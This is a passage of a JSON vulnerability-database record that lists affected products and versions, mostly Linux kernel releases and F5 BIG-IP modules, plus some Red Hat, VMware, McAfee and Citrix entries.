        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "big-ip pem hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "network security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.7"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.11"
      },
      {
        "model": "big-ip afm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "network security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "big-ip afm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "iworkflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.3"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.1"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "big-ip aam hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "siem enterprise security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "10.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "virtualization host extended update support for rhel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-4.27.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "sd-wan edge by velocloud",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "model": "big-ip asm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "vrealize network insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "vrealize business for cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "big-ip asm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "secure pulse connect secure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pulse",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.62"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.1"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip afm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "big-ip pem hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "threat intelligence exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.6"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.13"
      },
      {
        "model": "vrealize orchestrator appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "vcloud availability appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "big-ip aam hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "big-ip webaccelerator hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.9"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.16"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "vrealize suite lifecycle manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.3"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "big-ip analytics build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "big-ip aam hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "18.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "horizon daas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
